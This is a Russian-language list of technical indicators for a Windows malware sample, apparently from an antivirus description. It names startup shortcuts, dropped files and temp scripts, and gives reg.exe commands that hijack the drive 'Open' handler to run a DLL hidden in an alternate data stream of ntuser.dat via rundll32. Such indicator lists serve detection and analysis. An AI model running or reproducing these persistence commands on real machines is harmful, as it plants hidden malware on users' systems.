Техническая информация
- %ALLUSERSPROFILE%\Start Menu\Programs\Startup\EventActivate.lnk
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\Drive\shell\Open\command /ve /f /d "<SYSTEM32>\rundll32.exe C:\Documents and Settings\%USERNAME%\ntuser.dat:init,CDLocateRng ""%1"""
- '<SYSTEM32>\rundll32.exe' %ALLUSERSPROFILE%\Application Data\Microsoft\prov.cat,IlqUenn
- '<SYSTEM32>\reg.exe' add HKCU\Software\Classes\Drive\shell /ve /f /d "Open"
- '<SYSTEM32>\cmd.exe' /c init.cmd
- '<SYSTEM32>\cmd.exe' /c %TEMP%\vtrp.cmd
- %HOMEPATH%\NTUSER.DAT:init
- %TEMP%\vtrp.cmd
- %TEMP%\init
- %ALLUSERSPROFILE%\Application Data\Microsoft\prov.cat
- %ALLUSERSPROFILE%\Application Data\Microsoft\prov.cat
- %TEMP%\vtrp.cmd
- %TEMP%\init.cmd
- %HOMEPATH%\init
- %TEMP%\init в %HOMEPATH%\init